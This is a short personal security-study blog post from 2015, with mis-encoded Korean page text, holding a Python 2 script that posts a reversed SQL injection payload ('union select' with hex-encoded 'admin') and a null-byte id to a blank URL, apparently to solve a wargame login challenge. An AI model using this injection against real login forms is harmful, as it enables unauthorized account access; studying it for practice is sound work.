Security Study/Source

sql injection reverse

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 11. 21.
728x90
๋ฐ˜์‘ํ˜•
  1. import urllib
  2. import urllib2
  3.  
  4. url = ""
  5. req = urllib2.Request(url)
  6. sql = "union select 0x61646D696E 32%"
  7. data = "id=%00&pw=" + sql[::-1]
  8. #data = urllib.urlencode(data)
  9. req = urllib2.Request(url, data)
  10.  
  11. req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
  12. req.add_header('Cookie', 'PHPSESSID=')
  13.  
  14. response = urllib2.urlopen(req)
  15. headers = response.info().headers
  16. the_page = response.read()
  17.  
  18. print the_page


728x90
๋ฐ˜์‘ํ˜•

'Security Study > Source' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

mac ํ„ฐ๋ฏธ๋„ vim ๊พธ๋ฏธ๊ธฐ  (0) 2015.12.10
rtl chain  (0) 2015.11.21
์†Œ์ผ“ํ”„๋กœ๊ทธ๋ž˜๋ฐ  (0) 2015.11.21
Blind Sql Injection  (0) 2015.11.21
Base 64 encoding  (0) 2015.11.21

๋Œ“๊ธ€